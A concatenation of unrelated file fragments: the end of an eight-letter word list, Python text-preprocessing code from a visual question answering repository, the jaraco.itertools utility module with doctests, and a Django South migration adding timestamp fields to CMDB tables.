"garboard",
"garboils",
"gardened",
"gardyloo",
"garganey",
"garglers",
"gargling",
"garigues",
"garishly",
"garlicky",
"garoting",
"garotted",
"garotter",
"garottes",
"garpikes",
"garreted",
"garroted",
"garroter",
"garrotes",
"garrotte",
"gartered",
"gasalier",
"gaselier",
"gashouse",
"gasified",
"gasifier",
"gasifies",
"gasiform",
"gaskings",
"gasogene",
"gasohols",
"gasolene",
"gasolier",
"gassiest",
"gassings",
"gastight",
"gastness",
"gastraea",
"gastreas",
"gastrins",
"gastrula",
"gasworks",
"gateless",
"gatelike",
"gatepost",
"gauchely",
"gauchest",
"gaudiest",
"gauffers",
"gauntest",
"gauziest",
"gaveling",
"gavelled",
"gavelock",
"gavotted",
"gavottes",
"gawkiest",
"gayeties",
"gaywings",
"gazaboes",
"gazanias",
"gazeboes",
"gazelles",
"gazettes",
"gazogene",
"gazumped",
"gazumper",
"gearcase",
"gearings",
"gearless",
"geekdoms",
"geekiest",
"geepound",
"gelating",
"gelatins",
"gelation",
"geldings",
"gelidity",
"gellants",
"gelsemia",
"gematria",
"geminate",
"gemmated",
"gemmates",
"gemmiest",
"gemmules",
"gemology",
"gemsboks",
"gemsbuck",
"genettes",
"genially",
"genipaps",
"genitors",
"geniture",
"gennaker",
"genogram",
"genoises",
"gensengs",
"gentians",
"gentlest",
"gentling",
"gentrice",
"gentries",
"gentrify",
"geoducks",
"geognosy",
"geologer",
"geomancy",
"geometer",
"geophagy",
"geophone",
"geophyte",
"geoponic",
"geoprobe",
"georgics",
"geotaxes",
"geotaxis",
"geranial",
"geraniol",
"gerardia",
"gerbille",
"gerenuks",
"germfree",
"germiest",
"germlike",
"gerontic",
"gesneria",
"gestalts",
"gestapos",
"gestated",
"gestates",
"gestical",
"gestural",
"gesturer",
"gettable",
"gettered",
"gewgawed",
"gharials",
"gharries",
"ghastful",
"gheraoed",
"gheraoes",
"gherkins",
"ghettoed",
"ghettoes",
"ghillies",
"ghostier",
"ghoulies",
"giantism",
"giardias",
"gibbered",
"gibbeted",
"gibbsite",
"gibingly",
"giddiest",
"giddying",
"giftable",
"giftedly",
"giftless",
"gigabits",
"gigaflop",
"gigatons",
"gigawatt",
"gigglers",
"gigglier",
"gilberts",
"gildhall",
"gildings",
"gillnets",
"gillying",
"gilthead",
"gimbaled",
"gimcrack",
"gimleted",
"gimmicky",
"gimpiest",
"gingalls",
"gingeley",
"gingelis",
"gingelli",
"gingelly",
"gingered",
"ginghams",
"gingilis",
"gingilli",
"gingivae",
"gingkoes",
"ginkgoes",
"ginniest",
"ginnings",
"ginsengs",
"gipsying",
| |
<reponame>alexmirrington/mac-network
import json
import math
import os
import pickle
import random
import re
import time
import numpy as np
from nltk.tokenize import word_tokenize
from nltk.tokenize.stanford import StanfordTokenizer
from termcolor import colored
from tqdm import tqdm
from config import config
from program_translator import ProgramTranslator
# Print bold tex
def bold(txt):
return colored(str(txt), attrs=["bold"])
# Print bold and colored text
def bcolored(txt, color):
return colored(str(txt), color, attrs=["bold"])
# Write a line to file
def writeline(f, line):
f.write(str(line) + "\n")
# Write a list to file
def writelist(f, lst):
writeline(f, ",".join(map(str, lst)))
# 2d list to numpy
def vectorize2DList(items, minX=0, minY=0, dtype=np.int):
maxX = max(len(items), minX)
maxY = max([len(item) for item in items] + [minY])
t = np.zeros((maxX, maxY), dtype=dtype)
tLengths = np.zeros((maxX,), dtype=np.int)
for i, item in enumerate(items):
t[i, 0 : len(item)] = np.array(item, dtype=dtype)
tLengths[i] = len(item)
return t, tLengths
# 3d list to numpy
def vectorize3DList(items, minX=0, minY=0, minZ=0, dtype=np.int):
maxX = max(len(items), minX)
maxY = max([len(item) for item in items] + [minY])
maxZ = max([len(subitem) for item in items for subitem in item] + [minZ])
t = np.zeros((maxX, maxY, maxZ), dtype=dtype)
tLengths = np.zeros((maxX, maxY), dtype=np.int)
for i, item in enumerate(items):
for j, subitem in enumerate(item):
t[i, j, 0 : len(subitem)] = np.array(subitem, dtype=dtype)
tLengths[i, j] = len(subitem)
return t, tLengths
"""
Encodes text into integers. Keeps dictionary between string words (symbols)
and their matching integers. Supports encoding and decoding.
"""
class SymbolDict(object):
def __init__(self, empty=False):
self.padding = "<PAD>"
self.unknown = "<UNK>"
self.start = "<START>"
self.end = "<END>"
self.invalidSymbols = [self.padding, self.unknown, self.start, self.end]
if empty:
self.sym2id = {self.padding: 0}
self.id2sym = [self.padding]
else:
self.sym2id = {self.padding: 0, self.unknown: 1, self.start: 2, self.end: 3}
self.id2sym = [self.padding, self.unknown, self.start, self.end]
self.allSeqs = []
def getNumSymbols(self):
return len(self.sym2id)
def isValid(self, enc):
return enc not in self.invalidSymbols
def resetSeqs(self):
self.allSeqs = []
def addSymbols(self, seq):
if type(seq) is not list:
seq = [seq]
self.allSeqs += seq
# Call to create the words-to-integers vocabulary after
# (reading word sequences with addSymbols).
def addToVocab(self, symbol):
if symbol not in self.sym2id:
self.sym2id[symbol] = self.getNumSymbols()
self.id2sym.append(symbol)
# create vocab only if not existing..?
def createVocab(self, minCount=0, top=0, addUnk=False, weights=False):
counter = {}
for symbol in self.allSeqs:
counter[symbol] = counter.get(symbol, 0) + 1
isTop = lambda symbol: True
if top > 0:
topItems = sorted(counter.items(), key=lambda x: x[1], reverse=True)[:top]
tops = [k for k, v in topItems]
isTop = lambda symbol: symbol in tops
if addUnk:
self.addToVocab(self.unknown)
for symbol in counter:
if counter[symbol] > minCount and isTop(symbol):
self.addToVocab(symbol)
self.counter = counter
self.counts = np.array([counter.get(sym, 0) for sym in self.id2sym])
if weights:
self.weights = np.array([1.0 for sym in self.id2sym])
if config.ansWeighting:
weight = lambda w: 1.0 / float(w) if w > 0 else 0.0
self.weights = np.array(
[weight(counter.get(sym, 0)) for sym in self.id2sym]
)
totalWeight = np.sum(self.weights)
self.weights /= totalWeight
self.weights *= len(self.id2sym)
elif config.ansWeightingRoot:
weight = lambda w: 1.0 / math.sqrt(float(w)) if w > 0 else 0
self.weights = np.array(
[weight(counter.get(sym, 0)) for sym in self.id2sym]
)
totalWeight = np.sum(self.weights)
self.weights /= totalWeight
self.weights *= len(self.id2sym)
# Encodes a symbol. Returns the matching integer.
def encodeSym(self, symbol):
if symbol not in self.sym2id:
symbol = self.unknown
return self.sym2id[
symbol
] # self.sym2id.get(symbol, None) # # -1 VQA MAKE SURE IT DOESNT CAUSE BUGS
"""
Encodes a sequence of symbols.
Optionally add start, or end symbols.
Optionally reverse sequence
"""
def encodeSeq(self, decoded, addStart=False, addEnd=False, reverse=False):
if reverse:
decoded.reverse()
if addStart:
decoded = [self.start] + decoded
if addEnd:
decoded = decoded + [self.end]
encoded = [self.encodeSym(symbol) for symbol in decoded]
return encoded
# Decodes an integer into its symbol
def decodeId(self, enc):
return self.id2sym[enc] if enc < self.getNumSymbols() else self.unknown
"""
Decodes a sequence of integers into their symbols.
If delim is given, joins the symbols using delim,
Optionally reverse the resulted sequence
"""
def decodeSeq(self, encoded, delim=None, reverse=False, stopAtInvalid=True):
length = 0
for i in range(len(encoded)):
if not self.isValid(self.decodeId(encoded[i])) and stopAtInvalid:
# if not self.isValid(encoded[i]) and stopAtInvalid:
break
length += 1
encoded = encoded[:length]
decoded = [self.decodeId(enc) for enc in encoded]
if reverse:
decoded.reverse()
if delim is not None:
return delim.join(decoded)
return decoded
"""
Preprocesses a given dataset into numpy arrays.
By calling preprocess, the class:
1. Reads the input data files into dictionary.
2. Saves the results jsons in files and loads them instead of parsing input if
files exist
3. Initializes word embeddings to random / GloVe.
4. Optionally filters data according to given filters.
5. Encodes and vectorize the data into numpy arrays.
6. Buckets the data according to the instances length.
"""
class Preprocesser(object):
def __init__(self):
self.questionDict = SymbolDict()
self.answerDict = SymbolDict(empty=True)
self.qaDict = SymbolDict()
self.loadVocabs()
self.specificDatasetDicts = None
self.programDict = SymbolDict()
self.programTranslator = ProgramTranslator(self.programDict, 2)
"""
Tokenizes string into list of symbols.
Args:
text: raw string to tokenize.
ignorePuncts: punctuation to ignore
keptPunct: punctuation to keep (as symbol)
endPunct: punctuation to remove if appears at the end
delim: delimiter between symbols
clean: True to replace text in string
replacelistPre: dictionary of replacement to perform on the text before
tokenization
replacelistPost: dictionary of replacement to perform on the text after
tokenization
"""
# sentence tokenizer
allPunct = ["?", "!", "\\", "/", ")", "(", ".", ",", ";", ":"]
fullPunct = [
";",
r"/",
"[",
"]",
'"',
"{",
"}",
"(",
")",
"=",
"+",
"\\",
"_",
"-",
">",
"<",
"@",
"`",
",",
"?",
"!",
"%",
"^",
"&",
"*",
"~",
"#",
"$",
]
contractions = {
"aint": "ain't",
"arent": "aren't",
"cant": "can't",
"couldve": "could've",
"couldnt": "couldn't",
"couldn'tve": "couldn't've",
"couldnt've": "couldn't've",
"didnt": "didn't",
"doesnt": "doesn't",
"dont": "don't",
"hadnt": "hadn't",
"hadnt've": "hadn't've",
"hadn'tve": "hadn't've",
"hasnt": "hasn't",
"havent": "haven't",
"hed": "he'd",
"hed've": "he'd've",
"he'dve": "he'd've",
"hes": "he's",
"howd": "how'd",
"howll": "how'll",
"hows": "how's",
"Id've": "I'd've",
"I'dve": "I'd've",
"Im": "I'm",
"Ive": "I've",
"isnt": "isn't",
"itd": "it'd",
"itd've": "it'd've",
"it'dve": "it'd've",
"itll": "it'll",
"let's": "let's",
"maam": "ma'am",
"mightnt": "mightn't",
"mightnt've": "mightn't've",
"mightn'tve": "mightn't've",
"mightve": "might've",
"mustnt": "mustn't",
"mustve": "must've",
"neednt": "needn't",
"notve": "not've",
"oclock": "o'clock",
"oughtnt": "oughtn't",
"ow's'at": "'ow's'at",
"'ows'at": "'ow's'at",
"'ow'sat": "'ow's'at",
"shant": "shan't",
"shed've": "she'd've",
"she'dve": "she'd've",
"she's": "she's",
"shouldve": "should've",
"shouldnt": "shouldn't",
"shouldnt've": "shouldn't've",
"shouldn'tve": "shouldn't've",
"somebody'd": "somebodyd",
"somebodyd've": "somebody'd've",
"somebody'dve": "somebody'd've",
"somebodyll": "somebody'll",
"somebodys": "somebody's",
"someoned": "someone'd",
"someoned've": "someone'd've",
"someone'dve": "someone'd've",
"someonell": "someone'll",
"someones": "someone's",
"somethingd": "something'd",
"somethingd've": "something'd've",
"something'dve": "something'd've",
"somethingll": "something'll",
"thats": "that's",
"thered": "there'd",
"thered've": "there'd've",
"there'dve": "there'd've",
"therere": "there're",
"theres": "there's",
"theyd": "they'd",
"theyd've": "they'd've",
"they'dve": "they'd've",
"theyll": "they'll",
"theyre": "they're",
"theyve": "they've",
"twas": "'twas",
"wasnt": "wasn't",
"wed've": "we'd've",
"we'dve": "we'd've",
"weve": "we've",
"werent": "weren't",
"whatll": "what'll",
"whatre": "what're",
"whats": "what's",
"whatve": "what've",
"whens": "when's",
"whered": "where'd",
"wheres": "where's",
"whereve": "where've",
"whod": "who'd",
"whod've": "who'd've",
"who'dve": "who'd've",
"wholl": "who'll",
"whos": "who's",
"whove": "who've",
"whyll": "why'll",
"whyre": "why're",
"whys": "why's",
"wont": "won't",
"wouldve": "would've",
"wouldnt": "wouldn't",
"wouldnt've": "wouldn't've",
"wouldn'tve": "wouldn't've",
"yall": "y'all",
"yall'll": "y'all'll",
"y'allll": "y'all'll",
"yall'd've": "y'all'd've",
"y'alld've": "y'all'd've",
"y'all'dve": "y'all'd've",
"youd": "you'd",
"youd've": "you'd've",
"you'dve": "you'd've",
"youll": "you'll",
"youre": "you're",
"youve": "you've",
}
nums = {
"none": "0",
"zero": "0",
"one": "1",
"two": "2",
"three": "3",
"four": "4",
"five": "5",
"six": "6",
"seven": "7",
"eight": "8",
"nine": "9",
"ten": "10",
}
articles = {"a": "", "an": "", "the": ""}
allReplaceQ = {}
for replace in [contractions, nums, articles]: # ,
allReplaceQ.update(replace)
allReplaceA = {}
for replace in [contractions, nums]: # ,
allReplaceA.update(replace)
periodStrip = lambda self, s: re.sub(r"(?!<=\d)(\.)(?!\d)", " ", s) # :,' ?
collonStrip = lambda self, s: re.sub(
r"(?!<=\d)(:)(?!\d)", " ", s
) # replace with " " or ""?
commaNumStrip = lambda self, s: re.sub(r"(\d)(\,)(\d)", r"\1\3", s)
# remove any non a-zA-Z0-9?
vqaProcessText = lambda self, text, tokenize, question: self.processText(
text,
ignoredPunct=[],
keptPunct=[],
endPunct=[],
delimPunct=self.fullPunct,
replacelistPost=self.allReplaceQ if question else self.allReplaceA,
reClean=True,
tokenize=tokenize,
)
def processText(
self,
text,
ignoredPunct=["?", "!", "\\", "/", ")", "("],
keptPunct=[".", ",", ";", ":"],
endPunct=[">", "<", ":"],
delimPunct=[],
delim=" ",
clean=False,
replacelistPre=dict(),
replacelistPost=dict(),
reClean=False,
tokenize=True,
):
if reClean:
text = self.periodStrip(text)
text = self.collonStrip(text)
text = self.commaNumStrip(text)
if clean:
for word in replacelistPre:
origText = text
text = text.replace(word, replacelistPre[word])
if origText != text:
print(origText)
print(text)
print("")
for punct in endPunct:
if text[-1] == punct:
print(text)
text = text[:-1]
print(text)
| |
"""
jaraco.itertools
Tools for working with iterables. Complements itertools and more_itertools.
"""
import operator
import itertools
import collections
import math
import warnings
import functools
import heapq
import collections.abc
import queue
import inflect
import more_itertools
def make_rows(num_columns, seq):
"""
Make a sequence into rows of num_columns columns.
>>> tuple(make_rows(2, [1, 2, 3, 4, 5]))
((1, 4), (2, 5), (3, None))
>>> tuple(make_rows(3, [1, 2, 3, 4, 5]))
((1, 3, 5), (2, 4, None))
"""
# calculate the minimum number of rows necessary to fit the list in
# num_columns Columns
num_rows, partial = divmod(len(seq), num_columns)
if partial:
num_rows += 1
# break the seq into num_columns of length num_rows
try:
result = more_itertools.grouper(seq, num_rows)
except TypeError:
# more_itertools before 6.x
result = more_itertools.grouper(num_rows, seq)
# result is now a list of columns... transpose it to return a list
# of rows
return zip(*result)
def bisect(seq, func=bool):
"""
Split a sequence into two sequences: the first is elements that
return False for func(element) and the second for True for
func(element).
By default, func is ``bool``, so uses the truth value of the object.
>>> is_odd = lambda n: n%2
>>> even, odd = bisect(range(5), is_odd)
>>> list(odd)
[1, 3]
>>> list(even)
[0, 2, 4]
>>> other, zeros = bisect(reversed(range(5)))
>>> list(zeros)
[0]
>>> list(other)
[4, 3, 2, 1]
"""
queues = GroupbySaved(seq, func)
return queues.get_first_n_queues(2)
class GroupbySaved:
"""
Split a sequence into n sequences where n is determined by the
number of distinct values returned by a key function applied to each
element in the sequence.
>>> truthsplit = GroupbySaved(['Test', '', 30, None], bool)
>>> truthsplit['x']
Traceback (most recent call last):
...
KeyError: 'x'
>>> true_items = truthsplit[True]
>>> false_items = truthsplit[False]
>>> tuple(iter(false_items))
('', None)
>>> tuple(iter(true_items))
('Test', 30)
>>> every_third_split = GroupbySaved(range(99), lambda n: n%3)
>>> zeros = every_third_split[0]
>>> ones = every_third_split[1]
>>> twos = every_third_split[2]
>>> next(zeros)
0
>>> next(zeros)
3
>>> next(ones)
1
>>> next(twos)
2
>>> next(ones)
4
"""
def __init__(self, sequence, func=lambda x: x):
self.sequence = iter(sequence)
self.func = func
self.queues = collections.OrderedDict()
def __getitem__(self, key):
try:
return self.queues[key]
except KeyError:
return self.__find_queue__(key)
def __fetch__(self):
"get the next item from the sequence and queue it up"
item = next(self.sequence)
key = self.func(item)
queue = self.queues.setdefault(key, FetchingQueue(self.__fetch__))
queue.enqueue(item)
def __find_queue__(self, key):
"search for the queue indexed by key"
try:
while key not in self.queues:
self.__fetch__()
return self.queues[key]
except StopIteration:
raise KeyError(key)
def get_first_n_queues(self, n):
"""
Run through the sequence until n queues are created and return
them. If fewer are created, return those plus empty iterables to
compensate.
"""
try:
while len(self.queues) < n:
self.__fetch__()
except StopIteration:
pass
values = list(self.queues.values())
missing = n - len(values)
values.extend(iter([]) for n in range(missing))
return values
class FetchingQueue(queue.Queue):
"""
A FIFO Queue that is supplied with a function to inject more into
the queue if it is empty.
>>> values = iter(range(10))
>>> get_value = lambda: globals()['q'].enqueue(next(values))
>>> q = FetchingQueue(get_value)
>>> [x for x in q] == list(range(10))
True
Note that tuple(q) or list(q) would not have worked above because
tuple(q) just copies the elements in the list (of which there are
none).
"""
def __init__(self, fetcher):
super().__init__()
self._fetcher = fetcher
def __next__(self):
while self.empty():
self._fetcher()
return self.get()
def __iter__(self):
while True:
try:
yield next(self)
except StopIteration:
return
def enqueue(self, item):
self.put_nowait(item)
class Count:
"""
A stop object that will count how many times it's been called and return
False on the N+1st call. Useful for use with takewhile.
>>> tuple(itertools.takewhile(Count(5), range(20)))
(0, 1, 2, 3, 4)
>>> print('catch', Count(5))
catch at most 5
It's possible to construct a Count with no limit or infinite limit.
>>> unl_c = Count(None)
>>> inf_c = Count(float('Inf'))
Unlimited or limited by infinity are equivalent.
>>> unl_c == inf_c
True
An unlimited counter is useful for wrapping an iterable to get the
count after it's consumed.
>>> tuple(itertools.takewhile(unl_c, range(20)))[-3:]
(17, 18, 19)
>>> unl_c.count
20
If all you need is the count of items, consider :class:`Counter` instead.
"""
def __init__(self, limit):
self.count = 0
self.limit = limit if limit is not None else float('Inf')
def __call__(self, arg):
if self.count > self.limit:
raise ValueError("Should not call count stop more anymore.")
self.count += 1
return self.count <= self.limit
def __str__(self):
if self.limit:
return 'at most %d' % self.limit
else:
return 'all'
def __eq__(self, other):
return vars(self) == vars(other)
class islice:
"""May be applied to an iterable to limit the number of items returned.
Works similarly to count, except is called only once on an iterable.
Functionality is identical to islice, except for __str__ and reusability.
>>> tuple(islice(5).apply(range(20)))
(0, 1, 2, 3, 4)
>>> tuple(islice(None).apply(range(20)))
(0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19)
>>> print(islice(3, 10))
items 3 to 9
>>> print(islice(3, 10, 2))
every 2nd item from 3 to 9
"""
def __init__(self, *sliceArgs):
self.sliceArgs = sliceArgs
def apply(self, i):
return itertools.islice(i, *self.sliceArgs)
def __str__(self):
if self.sliceArgs == (None,):
result = 'all'
else:
result = self._formatArgs()
return result
def _formatArgs(self):
def slice_range(a_b):
return '%d to %d' % (a_b[0], a_b[1] - 1)
if len(self.sliceArgs) == 1:
result = 'at most %d' % self.sliceArgs
if len(self.sliceArgs) == 2:
result = 'items %s' % slice_range(self.sliceArgs)
if len(self.sliceArgs) == 3:
ord = inflect.engine().ordinal(self.sliceArgs[2])
range = slice_range(self.sliceArgs[0:2])
result = 'every %(ord)s item from %(range)s' % locals()
return result
class LessThanNBlanks:
"""
An object that when called will return True until n false elements
are encountered.
Can be used with filter or itertools.ifilter, for example:
>>> import itertools
>>> sampleData = ['string 1', 'string 2', '', 'string 3', '',
... 'string 4', '', '', 'string 5']
>>> first = itertools.takewhile(LessThanNBlanks(2), sampleData)
>>> tuple(first)
('string 1', 'string 2', '', 'string 3')
>>> first = itertools.takewhile(LessThanNBlanks(3), sampleData)
>>> tuple(first)
('string 1', 'string 2', '', 'string 3', '', 'string 4')
"""
def __init__(self, nBlanks):
self.limit = nBlanks
self.count = 0
def __call__(self, arg):
self.count += not arg
if self.count > self.limit:
raise ValueError("Should not call this object anymore.")
return self.count < self.limit
class LessThanNConsecutiveBlanks:
"""
An object that when called will return True until n consecutive
false elements are encountered.
Can be used with filter or itertools.ifilter, for example:
>>> import itertools
>>> sampleData = ['string 1', 'string 2', '', 'string 3', '', 'string 4',
... '', '', 'string 5']
>>> first = itertools.takewhile(LessThanNConsecutiveBlanks(2), sampleData)
>>> tuple(first)
('string 1', 'string 2', '', 'string 3', '', 'string 4', '')
"""
def __init__(self, nBlanks):
self.limit = nBlanks
self.count = 0
self.last = False
def __call__(self, arg):
self.count += not arg
if arg:
self.count = 0
self.last = operator.truth(arg)
if self.count > self.limit:
raise ValueError("Should not call this object anymore.")
return self.count < self.limit
class splitter:
"""
object that will split a string with the given arguments for each call.
>>> s = splitter(',')
>>> list(s('hello, world, this is your, master calling'))
['hello', ' world', ' this is your', ' master calling']
"""
def __init__(self, sep=None):
self.sep = sep
def __call__(self, s):
lastIndex = 0
while True:
nextIndex = s.find(self.sep, lastIndex)
if nextIndex != -1:
yield s[lastIndex:nextIndex]
lastIndex = nextIndex + 1
else:
yield s[lastIndex:]
break
def grouper_nofill_str(n, iterable):
"""
Take a sequence and break it up into chunks of the specified size.
The last chunk may be smaller than size.
This works very similar to grouper_nofill, except
it works with strings as well.
>>> tuple(grouper_nofill_str(3, 'foobarbaz'))
('foo', 'bar', 'baz')
You can still use it on non-strings too if you like.
>>> tuple(grouper_nofill_str(42, []))
()
>>> tuple(grouper_nofill_str(3, list(range(10))))
([0, 1, 2], [3, 4, 5], [6, 7, 8], [9])
"""
res = more_itertools.chunked(iterable, n)
if isinstance(iterable, str):
res = (''.join(item) for item in res)
return res
infinite_call = more_itertools.repeatfunc
def infiniteCall(f, *args):
warnings.warn("Use infinite_call")
return infinite_call(functools.partial(f, *args))
class Counter:
"""
Wrap an iterable in an object that stores the count of items
that pass through it.
>>> items = Counter(range(20))
>>> items.count
0
>>> values = list(items)
>>> items.count
20
"""
def | |
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'CIValueFloat.created'
db.add_column('cmdb_civaluefloat', 'created',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CIValueFloat.modified'
db.add_column('cmdb_civaluefloat', 'modified',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CIValueFloat.cache_version'
db.add_column('cmdb_civaluefloat', 'cache_version',
self.gf('django.db.models.fields.PositiveIntegerField')(default=0),
keep_default=False)
# Adding field 'CIContentTypePrefix.created'
db.add_column('cmdb_cicontenttypeprefix', 'created',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CIContentTypePrefix.modified'
db.add_column('cmdb_cicontenttypeprefix', 'modified',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CIContentTypePrefix.cache_version'
db.add_column('cmdb_cicontenttypeprefix', 'cache_version',
self.gf('django.db.models.fields.PositiveIntegerField')(default=0),
keep_default=False)
# Adding field 'CIValueChoice.created'
db.add_column('cmdb_civaluechoice', 'created',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CIValueChoice.modified'
db.add_column('cmdb_civaluechoice', 'modified',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CIValueChoice.cache_version'
db.add_column('cmdb_civaluechoice', 'cache_version',
self.gf('django.db.models.fields.PositiveIntegerField')(default=0),
keep_default=False)
# Adding field 'CIValueString.created'
db.add_column('cmdb_civaluestring', 'created',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CIValueString.modified'
db.add_column('cmdb_civaluestring', 'modified',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CIValueString.cache_version'
db.add_column('cmdb_civaluestring', 'cache_version',
self.gf('django.db.models.fields.PositiveIntegerField')(default=0),
keep_default=False)
# Adding field 'CI.created'
db.add_column('cmdb_ci', 'created',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CI.modified'
db.add_column('cmdb_ci', 'modified',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CI.cache_version'
db.add_column('cmdb_ci', 'cache_version',
self.gf('django.db.models.fields.PositiveIntegerField')(default=0),
keep_default=False)
# Adding field 'CIChangeGit.created'
db.add_column('cmdb_cichangegit', 'created',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CIChangeGit.modified'
db.add_column('cmdb_cichangegit', 'modified',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CIChangeGit.cache_version'
db.add_column('cmdb_cichangegit', 'cache_version',
self.gf('django.db.models.fields.PositiveIntegerField')(default=0),
keep_default=False)
# Adding field 'PuppetResourceStatus.created'
db.add_column('cmdb_puppetresourcestatus', 'created',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'PuppetResourceStatus.modified'
db.add_column('cmdb_puppetresourcestatus', 'modified',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'PuppetResourceStatus.cache_version'
db.add_column('cmdb_puppetresourcestatus', 'cache_version',
self.gf('django.db.models.fields.PositiveIntegerField')(default=0),
keep_default=False)
# Adding field 'PuppetLog.created'
db.add_column('cmdb_puppetlog', 'created',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'PuppetLog.modified'
db.add_column('cmdb_puppetlog', 'modified',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'PuppetLog.cache_version'
db.add_column('cmdb_puppetlog', 'cache_version',
self.gf('django.db.models.fields.PositiveIntegerField')(default=0),
keep_default=False)
# Adding field 'CILayer.created'
db.add_column('cmdb_cilayer', 'created',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CILayer.modified'
db.add_column('cmdb_cilayer', 'modified',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CILayer.cache_version'
db.add_column('cmdb_cilayer', 'cache_version',
self.gf('django.db.models.fields.PositiveIntegerField')(default=0),
keep_default=False)
# Adding field 'CIIncident.created'
db.add_column('cmdb_ciincident', 'created',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CIIncident.modified'
db.add_column('cmdb_ciincident', 'modified',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CIIncident.cache_version'
db.add_column('cmdb_ciincident', 'cache_version',
self.gf('django.db.models.fields.PositiveIntegerField')(default=0),
keep_default=False)
# Adding field 'CIValueDate.created'
db.add_column('cmdb_civaluedate', 'created',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CIValueDate.modified'
db.add_column('cmdb_civaluedate', 'modified',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CIValueDate.cache_version'
db.add_column('cmdb_civaluedate', 'cache_version',
self.gf('django.db.models.fields.PositiveIntegerField')(default=0),
keep_default=False)
# Adding field 'CIAttribute.created'
db.add_column('cmdb_ciattribute', 'created',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CIAttribute.modified'
db.add_column('cmdb_ciattribute', 'modified',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CIAttribute.cache_version'
db.add_column('cmdb_ciattribute', 'cache_version',
self.gf('django.db.models.fields.PositiveIntegerField')(default=0),
keep_default=False)
# Adding field 'CIChangeZabbixTrigger.created'
db.add_column('cmdb_cichangezabbixtrigger', 'created',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CIChangeZabbixTrigger.modified'
db.add_column('cmdb_cichangezabbixtrigger', 'modified',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CIChangeZabbixTrigger.cache_version'
db.add_column('cmdb_cichangezabbixtrigger', 'cache_version',
self.gf('django.db.models.fields.PositiveIntegerField')(default=0),
keep_default=False)
# Adding field 'CIProblem.created'
db.add_column('cmdb_ciproblem', 'created',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CIProblem.modified'
db.add_column('cmdb_ciproblem', 'modified',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CIProblem.cache_version'
db.add_column('cmdb_ciproblem', 'cache_version',
self.gf('django.db.models.fields.PositiveIntegerField')(default=0),
keep_default=False)
# Adding field 'CIChangeStatusOfficeIncident.created'
db.add_column('cmdb_cichangestatusofficeincident', 'created',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CIChangeStatusOfficeIncident.modified'
db.add_column('cmdb_cichangestatusofficeincident', 'modified',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CIChangeStatusOfficeIncident.cache_version'
db.add_column('cmdb_cichangestatusofficeincident', 'cache_version',
self.gf('django.db.models.fields.PositiveIntegerField')(default=0),
keep_default=False)
# Adding field 'CIChangePuppet.created'
db.add_column('cmdb_cichangepuppet', 'created',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CIChangePuppet.modified'
db.add_column('cmdb_cichangepuppet', 'modified',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CIChangePuppet.cache_version'
db.add_column('cmdb_cichangepuppet', 'cache_version',
self.gf('django.db.models.fields.PositiveIntegerField')(default=0),
keep_default=False)
# Adding field 'CIValueInteger.created'
db.add_column('cmdb_civalueinteger', 'created',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CIValueInteger.modified'
db.add_column('cmdb_civalueinteger', 'modified',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CIValueInteger.cache_version'
db.add_column('cmdb_civalueinteger', 'cache_version',
